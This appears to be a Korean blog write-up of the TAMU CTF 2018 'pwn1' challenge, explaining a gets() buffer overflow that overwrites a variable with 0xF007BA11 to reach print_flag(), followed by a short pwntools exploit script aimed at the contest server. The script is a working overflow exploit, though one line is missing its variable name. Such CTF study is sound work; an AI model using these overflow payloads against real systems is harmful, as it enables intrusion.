Pwnable/write up

[TAMU ctf 2018] pwn1

xxvd 2018. 5. 17. 00:54

되게 오래 전에 했던 tamu ctf인데 대회 당시에는 1,2,4번 밖에 못풀어서 다시 풀고 라업 씁니다,,                                                                       




문자열 s를 gets로 받는데 v5가 0xF007BA11 이면 print_flag() 함수를 출력해주기 때문에 overflow 시키고 v5를 0xF007BA11로 바꿔주면 돼요



대회 당시엔 이렇게 풀었습니다만,, 심심해서 익스코드도 짜봤습니다,, 뭐 딱히 할 것도 없었지만




1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
 
= remote("pwn.ctf.tamu.edu",4321)
 
payload=""
payload+="\x90"*23
payload+=p32(0xF007BA11)
 
sleep(0.5)
 
s.sendline(payload)
 
print s.recv()
cs